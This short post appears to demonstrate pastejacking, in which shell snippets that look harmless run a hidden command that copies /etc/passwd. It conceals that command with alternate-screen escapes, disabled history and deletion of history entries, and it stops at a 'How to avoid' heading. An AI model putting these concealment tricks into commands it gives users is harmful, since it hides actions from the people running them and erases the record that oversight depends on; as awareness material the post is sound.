Harmless Code:

echo test
echo foobar

Still looks harmless, but paste it to the terminal and you'll see…

echo test
cp /etc/passwd /tmp/
echo foobar

This time you won't even see it in your terminal…

echo test
tput smcup
cp /etc/passwd /tmp/
tput rmcup && echo -en "\e[1A\e[2K"
echo foobar

And this time not in the bash-history either…

echo test
tput smcup
set +o history
cp /etc/passwd /tmp/
 set -o history
 history -d $(history | tail -1 | cut -f2 -d\ )
 history -d $(history | tail -1 | cut -f2 -d\ )
 tput rmcup && echo -en "\e[1A\e[2K"
echo foobar

Copying to vi won't help you…

tput smcup
cp /etc/passwd /tmp/
tput rmcup && echo -en "\e[1A\e[2K"
echo test
echo foobar
This work only for vi, a beer for the first one how send's me code working with vim or nano. ;)

How to avoid